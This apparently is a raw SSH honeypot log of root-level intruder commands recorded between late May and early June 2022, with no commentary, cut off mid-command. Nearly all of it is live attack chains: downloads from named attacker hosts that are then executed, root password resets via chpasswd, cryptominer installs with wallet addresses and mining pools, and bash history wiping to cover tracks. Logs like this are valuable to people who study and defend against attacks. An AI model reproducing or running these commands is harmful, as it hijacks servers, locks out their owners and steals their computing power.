/etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig From 222.100.124.62 26-May-2022 02:50:34 ssh2 root Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig From 107.21.250.79 26-May-2022 05:18:36 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 93.176.229.145 26-May-2022 05:53:17 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig From 78.92.170.193 26-May-2022 05:53:18 ssh2 root echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig From 78.92.170.193 26-May-2022 05:53:23 ssh2 root Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig From 179.43.144.210 26-May-2022 13:35:02 ssh2 root Exec cd /tmp cd /var/run cd /mnt cd /root cd /; wget http://2.56.59.196/Saitama.sh; curl -O http://2.56.59.196/Saitama.sh; chmod 777 Saitama.sh; sh Saitama.sh; tftp 2.56.59.196 -c get tSaitama.sh; chmod 777 tSaitama.sh; sh tSaitama.sh; tftp -r tSaitama2.sh -g 2.56.59.196; chmod 777 tSaitama2.sh; sh tSaitama2.sh; ftpget -v -u anonymous -p anonymous -P 21 2.56.59.196 Saitama1.sh Saitama1.sh; sh Saitama1.sh; rm -rf Saitama.sh tSaitama.sh tSaitama2.sh Saitama1.sh; rm -rf * cd /tmp cd /var/run cd /mnt cd /root cd / wget http://2.56.59.196/Saitama.sh curl -O http://2.56.59.196/Saitama.sh chmod 777 Saitama.sh sh Saitama.sh tftp 2.56.59.196 -c get tSaitama.sh chmod 777 tSaitama.sh sh tSaitama.sh tftp -r tSaitama2.sh -g 2.56.59.196 chmod 777 tSaitama2.sh sh tSaitama2.sh ftpget -v -u anonymous -p anonymous -P 21 2.56.59.196 Saitama1.sh Saitama1.sh sh Saitama1.sh rm -rf Saitama.sh tSaitama.sh tSaitama2.sh Saitama1.sh rm -rf * From 85.202.169.117 27-May-2022 07:51:36 ssh2 root Exec wget 46.19.137.50/sh; chmod 777 sh; ./sh myx86 wget 46.19.137.50/sh chmod 777 sh ./sh myx86 From 20.40.49.189 28-May-2022 01:04:19 ssh2 root Exec uname -s -v -n -r;nproc; uname -s -v -n -r nproc From 179.43.154.185 28-May-2022 07:03:04 ssh2 root Exec echo root:d33gs34tij24iu33j3i433gh33g43r3g|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA echo root:d33gs34tij24iu33j3i433gh33g43r3g|chpasswd|bash lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA From 38.55.192.181 28-May-2022 15:35:02 ssh2 root cd ifconfig ethtool eth0 netstat -natp wget http://38.55.192.181:5555/csrss From 179.43.142.180 28-May-2022 19:15:49 ssh2 root Exec echo root:dgti3j26jti5u5ji6rgg73554313gg3|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA echo root:dgti3j26jti5u5ji6rgg73554313gg3|chpasswd|bash lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA From 38.55.196.195 29-May-2022 08:24:22 ssh2 root ifconfig ls wget http://38.55.196.195:6236/csrss From 179.43.142.180 29-May-2022 16:42:26 ssh2 root Exec echo root:dgti3j26jti5u5ji6rgg73554313gg3|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA echo root:dgti3j26jti5u5ji6rgg73554313gg3|chpasswd|bash lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA From 185.210.144.122 30-May-2022 03:17:15 ssh2 root Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig From 185.210.144.122 30-May-2022 03:17:35 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 118.218.209.149 30-May-2022 03:26:26 ssh2 root Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig From 153.121.44.98 30-May-2022 03:26:26 ssh2 root echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig From 117.54.14.169 30-May-2022 03:31:13 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig From 67.48.56.148 30-May-2022 03:58:05 ssh2 root Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 64.98.86.50 30-May-2022 08:44:41 ssh2 root Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec cd /var/tmp || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.60.126/krn.tar || curl -o krn.tar http://209.141.60.126/krn.tar; tar -xf krn.tar; cd krn; chmod +x *; ./sshd; ./krane 123456 cd /var/tmp || cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://209.141.60.126/krn.tar || curl -o krn.tar http://209.141.60.126/krn.tar tar -xf krn.tar cd krn chmod +x * ./sshd ./krane 123456 From 42.193.125.35 30-May-2022 16:40:05 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig From 212.193.30.249 30-May-2022 21:03:58 ssh2 root Exec uname -a ; wget http://49.212.165.107/img/.a/a.tgz ; tar -xf a.tgz ; rm -rf a.tgz ; perl a.pdf ; rm -rf a.pdf ; history -c uname -a wget http://49.212.165.107/img/.a/a.tgz tar -xf a.tgz rm -rf a.tgz perl a.pdf rm -rf a.pdf history -c From 179.43.142.180 30-May-2022 22:04:06 ssh2 root Exec echo root:3gti3j26jti5u5ji6rgg73554313gg3|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; wget http://peace.2fbaidu.com/x86_64; chmod 777 *; ./x86_64 x86hxed echo root:3gti3j26jti5u5ji6rgg73554313gg3|chpasswd|bash lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA wget http://peace.2fbaidu.com/x86_64 chmod 777 * ./x86_64 x86hxed From 179.43.142.180 1-Jun-2022 07:19:35 ssh2 root Exec echo root:3gti3j26jti5u5ji6rgg73554313gg3|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; wget http://peace.2fbaidu.com/x86_64; chmod 777 *; ./x86_64 x86hxed echo root:3gti3j26jti5u5ji6rgg73554313gg3|chpasswd|bash lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA wget http://peace.2fbaidu.com/x86_64 chmod 777 * ./x86_64 x86hxed From 37.0.10.182 1-Jun-2022 20:50:09 ssh2 root Exec cd /tmp/; rm -rf *x86*; wget 198.98.62.154/x86_64; chmod 777 x86_64; ./x86_64 x86xhed cd /tmp/ rm -rf *x86* wget 198.98.62.154/x86_64 chmod 777 x86_64 ./x86_64 x86xhed From 37.0.10.182 2-Jun-2022 04:13:04 ssh2 root Exec cd /tmp/; rm -rf *x86*; wget 198.98.62.154/x86_64; chmod 777 x86_64; ./x86_64 x86xhed cd /tmp/ rm -rf *x86* wget 198.98.62.154/x86_64 chmod 777 x86_64 ./x86_64 x86xhed From 83.224.158.217 2-Jun-2022 20:10:39 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 83.224.158.217 2-Jun-2022 20:22:31 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 209.141.60.126 2-Jun-2022 20:42:27 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec uname -a uname -a From 51.83.232.233 3-Jun-2022 03:48:47 ssh2 root Exec cd /tmp ; wget 137.74.144.79/ok.sh ; sh ok.sh ; rm -rf ok.sh ; curl -O 137.74.144.79/ok.sh ; sh ok.sh ; rm -rf ok.sh ; curl -O 137.74.144.79/cnrig ; chmod 777 cnrig ; ./cnrig -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------donate-level 1 -o pool.supportxmr.com:443 -u 42yA8XVUCAWKAztxYLTJ96e8pYfN5K3fQZBftWQkChTVaVuDkQskvxy9hZDFRacvo7KKGUkzptCsiGoXBKCAQnRWFMeWtcD -p skema -k --tls -B ; history -c ; cat /dev/null > ~/.bash_history && history -c && rm -rf /root/.bash_history ; history -c cd /tmp wget 137.74.144.79/ok.sh sh ok.sh rm -rf ok.sh curl -O 137.74.144.79/ok.sh sh ok.sh rm -rf ok.sh curl -O 137.74.144.79/cnrig chmod 777 cnrig ./cnrig -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------donate-level 1 -o pool.supportxmr.com:443 -u 42yA8XVUCAWKAztxYLTJ96e8pYfN5K3fQZBftWQkChTVaVuDkQskvxy9hZDFRacvo7KKGUkzptCsiGoXBKCAQnRWFMeWtcD -p skema -k --tls -B history -c cat /dev/null > ~/.bash_history history -c rm -rf /root/.bash_history history -c From 209.141.60.126 3-Jun-2022 16:54:06 ssh2 root Exec cd /var/tmp || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.60.126/krn.tar || curl -o krn.tar http://209.141.60.126/krn.tar; tar -xf krn.tar; cd krn; chmod +x *; ./sshd; ./krane 123456 cd /var/tmp || cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://209.141.60.126/krn.tar || curl -o krn.tar http://209.141.60.126/krn.tar tar -xf krn.tar cd krn chmod +x * ./sshd ./krane 123456 From 209.141.60.126 3-Jun-2022 17:54:05 ssh2 root Exec cd /var/tmp || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.60.126/krn.tar || curl -o krn.tar http://209.141.60.126/krn.tar; tar -xf krn.tar; cd krn; chmod +x *; ./sshd; ./krane 123456 cd /var/tmp || cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://209.141.60.126/krn.tar || curl -o krn.tar http://209.141.60.126/krn.tar tar -xf krn.tar cd krn chmod +x * ./sshd ./krane 123456 From 150.95.137.118 4-Jun-2022 05:22:54 ssh2 root Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://39.165.53.17:8088/iposzz/dred -o /tmp/dred;perl /tmp/dred uname -a lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://39.165.53.17:8088/iposzz/dred -o /tmp/dred perl /tmp/dred From 179.43.154.185 4-Jun-2022 06:45:03 ssh2 root Exec echo root:d33gs34tij24iu33j3i4333gh33g43rg33g|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; cd /tmp; wget http://2.56.57.167/x86_64; chmod 777 *; ./x86_64 x86hxed echo root:d33gs34tij24iu33j3i4333gh33g43rg33g|chpasswd|bash lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA cd /tmp wget http://2.56.57.167/x86_64 chmod 777 * ./x86_64 x86hxed From 179.43.154.185 4-Jun-2022 08:20:41 ssh2 root Exec echo root:d33gs34tij24iu33j3i4333gh33g43rg33g|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; cd /tmp; wget http://2.56.57.167/x86_64; chmod 777 *; ./x86_64 x86hxed echo root:d33gs34tij24iu33j3i4333gh33g43rg33g|chpasswd|bash lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA cd /tmp wget http://2.56.57.167/x86_64 chmod 777 * ./x86_64 x86hxed From 179.43.142.180 4-Jun-2022 14:47:37 ssh2 root Exec echo root:3gti3j26jti5u5ji6rgg73554313gg33hg|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; wget http://2.56.57.167/x86_64; chmod 777 *; ./x86_64 x86hxed echo root:3gti3j26jti5u5ji6rgg73554313gg33hg|chpasswd|bash lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA wget http://2.56.57.167/x86_64 chmod 777 * ./x86_64 x86hxed From 18.132.68.163 5-Jun-2022 02:01:17 ssh2 root ls uname -a cat /proc/cpuinfo ifconfig nano /etc/ssh/sshd_config yum apt-get apt-get install nano apt-get install nano install nano nanogg33hg|chpasswd|bash install nano install nano nanogg33hg|chpasswd|bash nano install nano nanogg33hg|chpasswd|bash/master/setup_c3pool_miner.sh install nano install nano nanogg33hg|chpasswd|bash install nano install nano nanogg33hg|chpasswd|bash nano install nano nanogg33hg|chpasswd|bash/master/setup_c3pool_miner.sh nano install nano /var/ssh/sshd_config nano From 18.132.68.163 5-Jun-2022 02:05:05 ssh2 root ls cd .. ls vf / cd / ls cat proxy.doc ls -a From 164.132.200.123 5-Jun-2022 06:57:54 ssh2 root Exec cd /tmp ; wget 137.74.144.79/ok.sh ; sh ok.sh ; rm -rf ok.sh ; curl -O 137.74.144.79/ok.sh ; sh ok.sh ; rm -rf ok.sh ; curl -O 137.74.144.79/cnrig ; chmod 777 cnrig ; ./cnrig -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------donate-level 1 -o pool.supportxmr.com:443 -u 42yA8XVUCAWKAztxYLTJ96e8pYfN5K3fQZBftWQkChTVaVuDkQskvxy9hZDFRacvo7KKGUkzptCsiGoXBKCAQnRWFMeWtcD -p skema -k --tls -B ; history -c ; cat /dev/null > ~/.bash_history && history -c && rm -rf /root/.bash_history cd /tmp wget 137.74.144.79/ok.sh sh ok.sh rm -rf ok.sh curl -O 137.74.144.79/ok.sh sh ok.sh rm -rf ok.sh curl -O 137.74.144.79/cnrig chmod 777 cnrig ./cnrig -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------donate-level 1 -o pool.supportxmr.com:443 -u 42yA8XVUCAWKAztxYLTJ96e8pYfN5K3fQZBftWQkChTVaVuDkQskvxy9hZDFRacvo7KKGUkzptCsiGoXBKCAQnRWFMeWtcD -p skema -k --tls -B history -c cat /dev/null > ~/.bash_history history -c rm -rf /root/.bash_history From 179.43.142.180 5-Jun-2022 11:56:50 ssh2 root Exec echo root:3gti3j26jti5u5ji6rgg73554313gg33hg|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; wget http://2.56.57.167/x86_64; chmod 777 *; ./x86_64 x86hxed echo root:3gti3j26jti5u5ji6rgg73554313gg33hg|chpasswd|bash lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA wget http://2.56.57.167/x86_64 chmod 777 * ./x86_64 x86hxed From 81.17.18.60 6-Jun-2022 05:32:15 ssh2 root Exec ping 8.8.8.8 ping 8.8.8.8 From 164.132.200.123 6-Jun-2022 21:25:56 ssh2 root Exec wget 137.74.144.79/ok.sh ; sh ok.sh ; rm -rf ok.sh ; curl -O 137.74.144.79/ok.sh ; sh ok.sh ; rm -rf ok.sh ; rm -rf cnrig ; pkill cnrig ; curl -O 137.74.144.79/cnrig ; chmod 777 cnrig ; ./cnrig -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------donate-level 1 -o pool.supportxmr.com:443 -u 42yA8XVUCAWKAztxYLTJ96e8pYfN5K3fQZBftWQkChTVaVuDkQskvxy9hZDFRacvo7KKGUkzptCsiGoXBKCAQnRWFMeWtcD -p skema -k --tls -B ; history -c ; cat /dev/null > ~/.bash_history && history -c && rm -rf /root/.bash_history wget 137.74.144.79/ok.sh sh ok.sh rm -rf ok.sh curl -O 137.74.144.79/ok.sh sh ok.sh rm -rf ok.sh rm -rf cnrig pkill cnrig curl -O 137.74.144.79/cnrig chmod 777 cnrig ./cnrig -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------donate-level 1 -o pool.supportxmr.com:443 -u 42yA8XVUCAWKAztxYLTJ96e8pYfN5K3fQZBftWQkChTVaVuDkQskvxy9hZDFRacvo7KKGUkzptCsiGoXBKCAQnRWFMeWtcD -p skema -k --tls -B history -c cat /dev/null > ~/.bash_history history -c rm -rf /root/.bash_history From 13.76.194.129 8-Jun-2022 02:55:56 ssh2 root Exec nproc;uname -a nproc uname -a From 150.95.137.118 8-Jun-2022 04:06:06 ssh2 root Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://39.165.53.17:8088/iposzz/dred -o /tmp/dred;perl /tmp/dred uname -a lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://39.165.53.17:8088/iposzz/dred -o /tmp/dred perl /tmp/dred Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://39.165.53.17:8088/iposzz/dred -o /tmp/dred;perl /tmp/dred uname -a lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://39.165.53.17:8088/iposzz/dred -o /tmp/dred perl /tmp/dred Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://39.165.53.17:8088/iposzz/dred -o 